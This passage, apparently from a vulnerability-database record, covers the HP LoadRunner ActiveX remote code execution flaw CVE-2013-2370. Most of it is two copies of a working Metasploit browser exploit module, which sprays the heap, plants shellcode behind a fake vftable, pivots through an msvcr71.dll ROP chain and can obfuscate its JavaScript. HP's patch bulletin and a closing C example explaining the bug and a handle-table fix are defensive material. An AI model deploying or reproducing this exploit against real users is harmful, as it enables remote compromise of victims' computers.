This one is installed with HP LoadRunner.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'rgod <rgod[at]autistici.org>', # Vulnerability discovery\n 'juan vazquez' # Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-2370' ],\n [ 'OSVDB', '95640' ],\n [ 'BID', '61441'],\n [ 'ZDI', '13-182' ],\n [ 'URL', 'https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03862772' ]\n ],\n 'Payload' =>\n {\n 'Space' => 1024,\n 'DisableNops' => true,\n 'PrependEncoder' => \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n },\n 'DefaultOptions' =>\n {\n 'PrependMigrate' => true\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n # LrWebIERREWrapper.dll 11.50.2216.0\n [ 'Automatic', {} ],\n [ 'IE 7 on Windows XP SP3', { 'Rop' => nil, 'Offset' => '0x5F4' } ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :jre, 'Offset' => '0x5f4' } ],\n [ 'IE 7 on Windows Vista', { 'Rop' => nil, 'Offset' => '0x5f4' } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre, 'Offset' => '0x5f4' } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre, 'Offset' => '0x5f4' } ],\n [ 'IE 9 on Windows 7', { 'Rop' => :jre, 'Offset' => '0x5fe' } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => '2013-07-24',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n #If the user is already specified by the user, we'll just use that\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? 
and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def ie_heap_spray(my_target, p)\n js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))\n js_nops = Rex::Text.to_unescape(\"\\x0c\"*4, Rex::Arch.endian(target.arch))\n js_random_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch))\n randnop = rand_text_alpha(rand(100) + 1)\n\n # Land the payload at 0x0c0c0c0c\n case my_target\n when targets[6]\n # IE 9 on Windows 7\n js = %Q|\n function randomblock(blocksize)\n {\n var theblock = \"\";\n for (var i = 0; i < blocksize; i++)\n {\n theblock += Math.floor(Math.random()*90)+10;\n }\n return theblock;\n }\n\n function tounescape(block)\n {\n var blocklen = block.length;\n var unescapestr = \"\";\n for (var i = 0; i < blocklen-1; i=i+4)\n {\n unescapestr += \"%u\" + block.substring(i,i+4);\n }\n return unescapestr;\n }\n\n var heap_obj = new heapLib.ie(0x10000);\n var code = unescape(\"#{js_code}\");\n var #{randnop} = \"#{js_random_nops}\";\n var nops = unescape(#{randnop});\n while (nops.length < 0x80000) nops += nops;\n var offset_length = #{my_target['Offset']};\n for (var i=0; i < 0x1000; i++) {\n var padding = unescape(tounescape(randomblock(0x1000)));\n while (padding.length < 0x1000) padding+= padding;\n var junk_offset = padding.substring(0, offset_length);\n var single_sprayblock = junk_offset + code + nops.substring(0, 0x800 - code.length - junk_offset.length);\n while (single_sprayblock.length < 0x20000) single_sprayblock += single_sprayblock;\n sprayblock = single_sprayblock.substring(0, (0x40000-6)/2);\n heap_obj.alloc(sprayblock);\n }\n |\n\n else\n # For IE 6, 7, 8\n js = %Q|\n var heap_obj = new heapLib.ie(0x20000);\n var code = unescape(\"#{js_code}\");\n var #{randnop} = \"#{js_nops}\";\n var nops = unescape(#{randnop});\n while (nops.length < 0x80000) nops += nops;\n var offset = nops.substring(0, #{my_target['Offset']});\n var shellcode = 
offset + code + nops.substring(0, 0x800-code.length-offset.length);\n while (shellcode.length < 0x40000) shellcode += shellcode;\n var block = shellcode.substring(0, (0x80000-6)/2);\n heap_obj.gc();\n for (var i=1; i < 0x300; i++) {\n heap_obj.alloc(block);\n }\n |\n\n end\n\n js = heaplib(js, {:noobfu => true})\n\n if datastore['OBFUSCATE']\n js = ::Rex::Exploitation::JSObfu.new(js)\n js.obfuscate(memory_sensitive: true)\n end\n\n return js\n end\n\n def get_payload(t, cli)\n code = payload.encoded\n\n fake_object = [\n 0x0c0c0c0c, # fake vftable pointer\n 0x0c0c0c14 # function pointer\n ].pack(\"V*\")\n\n # No rop. Just return the payload.\n return fake_object + code if t['Rop'].nil?\n\n # Both ROP chains generated by mona.py - See corelan.be\n case t['Rop']\n when :jre\n print_status(\"Using msvcr71.dll ROP\")\n fake_object = [\n 0x0c0c0c0c, # fake vftable pointer\n 0x7c342643 # xchg eax,esp # pop edi # add byte ptr ds:[eax],al # pop ecx # retn\n ].pack(\"V*\")\n rop_payload = fake_object + generate_rop_payload('java', code)#, {'pivot'=>stack_pivot})\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n p = get_payload(my_target, cli)\n js = ie_heap_spray(my_target, p)\n object_id = rand_text_alpha(rand(10) + 8)\n\n html = %Q|\n <html>\n <head>\n <script>\n #{js}\n </script>\n </head>\n <body>\n <object classid='clsid:8D9E2CC7-D94B-4977-8510-FB49C361A139' id='#{object_id}'></object>\n <script language='javascript'>\n #{object_id}.WriteFileBinary(\"#{rand_text_alpha(4+ rand(4))}\", 0x0c0c0c0c);\n </script>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n # Avoid the attack if no suitable target found\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = 
html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/hp_loadrunner_writefilebinary.rb"}], "packetstorm": [{"lastseen": "2016-12-05T22:20:58", "description": "", "published": "2013-08-29T00:00:00", "type": "packetstorm", "title": "HP LoadRunner lrFileIOService ActiveX Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2370"], "modified": "2013-08-29T00:00:00", "id": "PACKETSTORM:123001", "href": "https://packetstormsecurity.com/files/123001/HP-LoadRunner-lrFileIOService-ActiveX-Remote-Code-Execution.html", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = NormalRanking \n \ninclude Msf::Exploit::Remote::HttpServer::HTML \ninclude Msf::Exploit::RopDb \ninclude Msf::Exploit::Remote::BrowserAutopwn \n \nautopwn_info({ \n:ua_name => HttpClients::IE, \n:ua_minver => \"6.0\", \n:ua_maxver => \"9.0\", \n:javascript => true, \n:os_name => OperatingSystems::WINDOWS, \n:rank => Rank, \n:classid => \"{8D9E2CC7-D94B-4977-8510-FB49C361A139}\", \n:method => \"WriteFileBinary\" \n}) \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => \"HP LoadRunner lrFileIOService ActiveX Remote Code Execution\", \n'Description' => %q{ \nThis module exploits a vulnerability on the lrFileIOService ActiveX, as installed \nwith HP LoadRunner 11.50. The vulnerability exists in the WriteFileBinary method \nwhere user provided data is used as a memory pointer. 
This module has been tested \nsuccessfully on IE6-IE9 on Windows XP, Vista and 7, using the LrWebIERREWrapper.dll \n11.50.2216.0. In order to bypass ASLR the no aslr compatible module msvcr71.dll is \nused. This one is installed with HP LoadRunner. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'rgod <rgod[at]autistici.org>', # Vulnerability discovery \n'juan vazquez' # Metasploit module \n], \n'References' => \n[ \n[ 'CVE', '2013-2370' ], \n[ 'OSVDB', '95640' ], \n[ 'BID', '61441'], \n[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-182/' ], \n[ 'URL', 'https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03862772' ] \n], \n'Payload' => \n{ \n'Space' => 1024, \n'DisableNops' => true, \n'PrependEncoder' => \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500 \n}, \n'DefaultOptions' => \n{ \n'PrependMigrate' => true \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n# LrWebIERREWrapper.dll 11.50.2216.0 \n[ 'Automatic', {} ], \n[ 'IE 7 on Windows XP SP3', { 'Rop' => nil, 'Offset' => '0x5F4' } ], \n[ 'IE 8 on Windows XP SP3', { 'Rop' => :jre, 'Offset' => '0x5f4' } ], \n[ 'IE 7 on Windows Vista', { 'Rop' => nil, 'Offset' => '0x5f4' } ], \n[ 'IE 8 on Windows Vista', { 'Rop' => :jre, 'Offset' => '0x5f4' } ], \n[ 'IE 8 on Windows 7', { 'Rop' => :jre, 'Offset' => '0x5f4' } ], \n[ 'IE 9 on Windows 7', { 'Rop' => :jre, 'Offset' => '0x5fe' } ] \n], \n'Privileged' => false, \n'DisclosureDate' => \"Jul 24 2013\", \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false]) \n], self.class) \n \nend \n \ndef get_target(agent) \n#If the user is already specified by the user, we'll just use that \nreturn target if target.name != 'Automatic' \n \nnt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || '' \nie = agent.scan(/MSIE (\\d)/).flatten[0] || '' \n \nie_name = \"IE #{ie}\" \n \ncase nt \nwhen '5.1' \nos_name = 'Windows XP SP3' \nwhen '6.0' \nos_name 
= 'Windows Vista' \nwhen '6.1' \nos_name = 'Windows 7' \nend \n \ntargets.each do |t| \nif (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name)) \nprint_status(\"Target selected as: #{t.name}\") \nreturn t \nend \nend \n \nreturn nil \nend \n \ndef ie_heap_spray(my_target, p) \njs_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch)) \njs_nops = Rex::Text.to_unescape(\"\\x0c\"*4, Rex::Arch.endian(target.arch)) \njs_random_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch)) \n \n# Land the payload at 0x0c0c0c0c \ncase my_target \nwhen targets[6] \n# IE 9 on Windows 7 \njs = %Q| \nfunction randomblock(blocksize) \n{ \nvar theblock = \"\"; \nfor (var i = 0; i < blocksize; i++) \n{ \ntheblock += Math.floor(Math.random()*90)+10; \n} \nreturn theblock; \n} \n \nfunction tounescape(block) \n{ \nvar blocklen = block.length; \nvar unescapestr = \"\"; \nfor (var i = 0; i < blocklen-1; i=i+4) \n{ \nunescapestr += \"%u\" + block.substring(i,i+4); \n} \nreturn unescapestr; \n} \n \nvar heap_obj = new heapLib.ie(0x10000); \nvar code = unescape(\"#{js_code}\"); \nvar nops = unescape(\"#{js_random_nops}\"); \nwhile (nops.length < 0x80000) nops += nops; \nvar offset_length = #{my_target['Offset']}; \nfor (var i=0; i < 0x1000; i++) { \nvar padding = unescape(tounescape(randomblock(0x1000))); \nwhile (padding.length < 0x1000) padding+= padding; \nvar junk_offset = padding.substring(0, offset_length); \nvar single_sprayblock = junk_offset + code + nops.substring(0, 0x800 - code.length - junk_offset.length); \nwhile (single_sprayblock.length < 0x20000) single_sprayblock += single_sprayblock; \nsprayblock = single_sprayblock.substring(0, (0x40000-6)/2); \nheap_obj.alloc(sprayblock); \n} \n| \n \nelse \n# For IE 6, 7, 8 \njs = %Q| \nvar heap_obj = new heapLib.ie(0x20000); \nvar code = unescape(\"#{js_code}\"); \nvar nops = unescape(\"#{js_nops}\"); \nwhile (nops.length < 0x80000) nops += nops; \nvar offset = 
nops.substring(0, #{my_target['Offset']}); \nvar shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length); \nwhile (shellcode.length < 0x40000) shellcode += shellcode; \nvar block = shellcode.substring(0, (0x80000-6)/2); \nheap_obj.gc(); \nfor (var i=1; i < 0x300; i++) { \nheap_obj.alloc(block); \n} \n| \n \nend \n \njs = heaplib(js, {:noobfu => true}) \n \nif datastore['OBFUSCATE'] \njs = ::Rex::Exploitation::JSObfu.new(js) \njs.obfuscate \nend \n \nreturn js \nend \n \ndef get_payload(t, cli) \ncode = payload.encoded \n \nfake_object = [ \n0x0c0c0c0c, # fake vftable pointer \n0x0c0c0c14 # function pointer \n].pack(\"V*\") \n \n# No rop. Just return the payload. \nreturn fake_object + code if t['Rop'].nil? \n \n# Both ROP chains generated by mona.py - See corelan.be \ncase t['Rop'] \nwhen :jre \nprint_status(\"Using msvcr71.dll ROP\") \nfake_object = [ \n0x0c0c0c0c, # fake vftable pointer \n0x7c342643 # xchg eax,esp # pop edi # add byte ptr ds:[eax],al # pop ecx # retn \n].pack(\"V*\") \nrop_payload = fake_object + generate_rop_payload('java', code)#, {'pivot'=>stack_pivot}) \nend \n \nreturn rop_payload \nend \n \ndef load_exploit_html(my_target, cli) \np = get_payload(my_target, cli) \njs = ie_heap_spray(my_target, p) \nobject_id = rand_text_alpha(rand(10) + 8) \n \nhtml = %Q| \n<html> \n<head> \n<script> \n#{js} \n</script> \n</head> \n<body> \n<object classid='clsid:8D9E2CC7-D94B-4977-8510-FB49C361A139' id='#{object_id}'></object> \n<script language='javascript'> \n#{object_id}.WriteFileBinary(\"#{rand_text_alpha(4+ rand(4))}\", 0x0c0c0c0c); \n</script> \n</body> \n</html> \n| \n \nreturn html \nend \n \ndef on_request_uri(cli, request) \nagent = request.headers['User-Agent'] \nuri = request.uri \nprint_status(\"Requesting: #{uri}\") \n \nmy_target = get_target(agent) \n# Avoid the attack if no suitable target found \nif my_target.nil? 
\nprint_error(\"Browser not supported, sending 404: #{agent}\") \nsend_not_found(cli) \nreturn \nend \n \nhtml = load_exploit_html(my_target, cli) \nhtml = html.gsub(/^\\t\\t/, '') \nprint_status(\"Sending HTML...\") \nsend_response(cli, html, {'Content-Type'=>'text/html'}) \nend \n \nend`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/123001/hp_loadrunner_writefilebinary.rb.txt"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:48", "bulletinFamily": "software", "cvelist": ["CVE-2013-4797", "CVE-2013-2370", "CVE-2013-4800", "CVE-2013-4798", "CVE-2013-2368", "CVE-2013-2369", "CVE-2013-4801", "CVE-2013-4799"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c03862772\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c03862772\r\nVersion: 1\r\n\r\nHPSBGN02905 rev.1 - HP LoadRunner, Remote Code Execution and Denial of\r\nService (DoS)\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2013-07-24\r\nLast Updated: 2013-07-24\r\n\r\nPotential Security Impact: Remote code execution, Denial of Service (DoS)\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nPotential security vulnerabilities have been identified with HP LoadRunner.\r\nThe vulnerabilities could be remotely exploited to allow execution of code or\r\nresult in a Denial of Service (DoS).\r\n\r\nReferences:\r\n\r\nCVE-2013-2368 (SSRT101081, ZDI-CAN-1669) Remote Denial of Service (DoS)\r\nCVE-2013-2369 (SSRT101082, ZDI-CAN-1670) Remote Code Execution\r\nCVE-2013-2370 (SSRT101083, ZDI-CAN-1671) Remote Code Execution\r\nCVE-2013-4797 (SSRT101084, ZDI-CAN-1690) Remote Code 
Execution\r\nCVE-2013-4798 (SSRT101074, ZDI-CAN-1705) Remote Code Execution\r\nCVE-2013-4799 (SSRT101114, ZDI-CAN-1734) Remote Code Execution\r\nCVE-2013-4800 (SSRT101117, ZDI-CAN-1735) Remote Code Execution\r\nCVE-2013-4801 (SSRT101085, ZDI-CAN-1736) Remote Code Execution\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP LoadRunner prior to v11.52\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2013-2368 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\r\nCVE-2013-2369 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\r\nCVE-2013-2370 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\r\nCVE-2013-4797 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\r\nCVE-2013-4798 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\r\nCVE-2013-4799 (AV:N/AC:H/Au:N/C:C/I:C/A:C) 7.6\r\nCVE-2013-4800 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\r\nCVE-2013-4801 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nThe Hewlett-Packard Company thanks Andrea Micalizzi aka rgod for working with\r\nthe TippingPoint Zero Day Initiative to report CVE-2013-2368, CVE-2013-2369,\r\nCVE-2013-2370, CVE-2013-4797 and CVE-2013-4801 to security-alert@hp.com\r\n\r\nThe Hewlett-Packard Company thanks Brian Gorenc from HP DVLabs for working\r\nwith the TippingPoint Zero Day Initiative to report CVE-2013-4798 to\r\nsecurity-alert@hp.com\r\n\r\nThe Hewlett-Packard Company thanks Tenable Network Security for working with\r\nthe TippingPoint Zero Day Initiative to report CVE-2013-4799 and\r\nCVE-2013-4800 to security-alert@hp.com\r\n\r\nRESOLUTION\r\n\r\nHP has made the following software update available to resolve the\r\nvulnerabilities.\r\n\r\nHP LoadRunner v11.52 or subsequent.\r\n\r\nThe software update is available from HP Software Support Online at\r\nhttp://support.openview.hp.com/selfsolve/document/KM00424389 
.\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 24 July 2013 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2013 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. 
To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits;damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.19 (GNU/Linux)\r\n\r\niEYEARECAAYFAlHwLG0ACgkQ4B86/C0qfVlv5wCgn8aewU6jORuKn7BKNK3QpKvU\r\nWtcAoM+RiD1hTExSVx2Ybver7PkYTvoR\r\n=ufJ9\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "modified": "2013-07-29T00:00:00", "published": "2013-07-29T00:00:00", "id": "SECURITYVULNS:DOC:29652", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:29652", "title": "[security bulletin] HPSBGN02905 rev.1 - HP LoadRunner, Remote Code Execution and Denial of Service (DoS)", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:52", "bulletinFamily": "software", "cvelist": ["CVE-2013-4797", "CVE-2013-2370", "CVE-2013-4800", "CVE-2013-4798", "CVE-2013-2368", "CVE-2013-2369", "CVE-2013-4801", "CVE-2013-4799"], "description": "DoS, code execution.", "edition": 1, "modified": "2013-07-29T00:00:00", "published": "2013-07-29T00:00:00", "id": "SECURITYVULNS:VULN:13218", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13218", "title": "HP LoadRunner multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
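The Metasploit module above states the bug in one line: in WriteFileBinary, "user provided data is used as a memory pointer". Its get_payload builds a two-dword fake object, [0x0c0c0c0c, 0x0c0c0c14], and the spray lands that object at 0x0c0c0c0c, so the control's dereference chain becomes: data (0x0c0c0c0c) is the object, the object's first dword is its vftable pointer (pointing back at itself), the second dword is the slot at vftable+4, which holds 0x0c0c0c14, the address just past the 8-byte object where payload.encoded (or, on the ROP targets, the xchg eax,esp pivot) begins. The C program below is an added example, not LoadRunner's code and not from the module: it models that dispatch with a hypothetical COM-style object layout (FileIo, FileIoVtbl, the method names and the 0xC0DE marker are all invented), builds the same self-referencing two-word blob in-process instead of spraying it to 0x0c0c0c0c, and shows the fix a practitioner would want, an opaque handle table so that no caller-supplied integer is ever dereferenced as an address.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Hypothetical COM-style object: word 0 is the vftable pointer.  This is a
 * model of the pattern, not LrWebIERREWrapper.dll's real layout. */
typedef struct FileIo FileIo;
typedef int (*method_fn)(FileIo *self, const char *name);
struct FileIoVtbl {
    method_fn release;   /* slot 0 */
    method_fn write;     /* slot 1: offset 4 on 32-bit, 8 on 64-bit */
};
struct FileIo {
    const struct FileIoVtbl *vt;
    char path[64];
};

static int legit_write(FileIo *self, const char *name)
{
    (void)self; (void)name;
    return 1;                                   /* "wrote" successfully */
}
static const struct FileIoVtbl legit_vtbl = { legit_write, legit_write };
FileIo g_real = { &legit_vtbl, "" };            /* one genuine object */

/* VULNERABLE: the caller's integer is trusted as an object address and the
 * control dispatches a virtual call through whatever it finds there. */
int write_file_binary_unsafe(const char *name, uintptr_t data)
{
    FileIo *obj = (FileIo *)data;               /* attacker picks the address */
    return obj->vt->write(obj, name);           /* vftable -> slot 1 -> call */
}

/* HARDENED: callers only ever hold opaque handles, which are indices into a
 * table the control owns.  Any other value is rejected before a dereference,
 * so a sprayed address can never be reached through this method. */
#define MAX_HANDLES 8
static FileIo *g_handles[MAX_HANDLES];

int fileio_open(FileIo *obj)
{
    for (int h = 0; h < MAX_HANDLES; h++) {
        if (g_handles[h] == NULL) { g_handles[h] = obj; return h; }
    }
    return -1;                                  /* table full */
}

int write_file_binary_safe(const char *name, uintptr_t data)
{
    if (data >= MAX_HANDLES || g_handles[data] == NULL)
        return -1;                              /* not a live handle */
    FileIo *obj = g_handles[data];
    return obj->vt->write(obj, name);
}

/* Attacker side, built in-process instead of sprayed to 0x0c0c0c0c.  Same
 * two-word shape as the module's [0x0c0c0c0c, 0x0c0c0c14].pack("V*"): word 0
 * points at the blob itself (the blob doubles as its own vftable), word 1 is
 * vftable slot 1, which is what the virtual call lands on.  In the module that
 * word is the shellcode address (or the xchg eax,esp pivot); here it is a
 * harmless function returning an invented marker value. */
static int attacker_fn(FileIo *self, const char *name)
{
    (void)self; (void)name;
    return 0xC0DE;
}
static struct FakeObject {
    const struct FileIoVtbl *fake_vftable;      /* == address of this blob */
    method_fn slot1;                            /* "function pointer" */
} g_fake;

uintptr_t build_fake_object(void)
{
    g_fake.fake_vftable = (const struct FileIoVtbl *)&g_fake;
    g_fake.slot1 = attacker_fn;
    return (uintptr_t)&g_fake;                  /* what the attacker passes */
}

int main(void)
{
    uintptr_t data = build_fake_object();
    printf("unsafe: %#x\n", (unsigned)write_file_binary_unsafe("a.bin", data)); /* 0xc0de */
    printf("safe  : %d\n", write_file_binary_safe("a.bin", data));             /* -1 */
    int h = fileio_open(&g_real);
    printf("safe  : %d\n", write_file_binary_safe("a.bin", (uintptr_t)h));     /* 1 */
    return 0;
}
```

The unsafe path needs no corruption of the real object at all: the integer argument alone steers the virtual call, which is why the module only has to make 0x0c0c0c0c readable and self-consistent. The handle-table version also answers the question an auditor asks of any ActiveX or COM method that accepts a number: is it ever cast to a pointer, and if so, is it checked against something the control itself allocated.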